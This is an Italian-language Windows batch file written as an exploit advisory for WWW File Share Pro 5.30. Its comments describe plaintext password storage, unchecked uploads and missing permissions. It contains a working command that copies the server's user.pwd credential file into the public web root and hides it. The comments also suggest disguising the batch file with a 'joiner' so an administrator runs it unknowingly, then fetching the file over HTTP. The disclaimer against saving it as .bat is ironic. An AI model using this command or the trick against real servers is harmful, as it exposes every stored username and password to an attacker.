rem 19/05/08
rem WWW File Share pro 5.30 
rem http://www.wfshome.com/download/wfspsetup.exe
rem Molteplici e insicure logiche nel server.....

rem *Problemi nella custodia dei user e pass nell'autentificazione base*

rem 1) Il file che contiene i login per accedere non è un file slide e quindi se linkcato manda il contenuto
rem 2)le pass non vengono scritte con una cifratura quidi una volta ottenuto il file si avranno oltre a i user anche le pass 

rem *Non comtrolla il formato del file che viene uploadato quindi accetta indiscriminatamente qualsiasi file di qualsiasi formato*

rem *Non si possono settare i permessi 666 777 ecc.*

rem morare della favola se per qualche motivo l'aministratore del server avvia una procedura di sistema dos tipo

cmd /c CD c:\Programmi\WWW File Share Pro\ & COPY user.pwd .\Root & ATTRIB H .\Root\user.pwd

rem ovviamente ci si aspetta che un aministratore sia un pò smaliziato ed non esegua un file bat o sys per esempio senza sapere 
rem quello che fà ma cmq esistono i joiner che servono a questo......
rem quindi a occhio nudo neanche un admin esperto lo riconoscerebbe come file batch......
rem ci sarebbero da fare anche delle considerazione sul socket e sulle restrizioni che vengono fatte visto che in automatico banna rem l'usrer incriminato.... Ma ora non ho il tempo di farle forse in futuro......

rem a si mi raccomando non salvate questo file in bat perchè se lo fate eseguire ad un admin con server wfs potrete andando 
rem all'indirizzo http://macchnattaccata/user.pwd e vedete tutte le pass e user in memoria nel server e compireste una cosa 
rem illegale che io non voglio in alcun modo centrare.....
rem ciao ciao gmda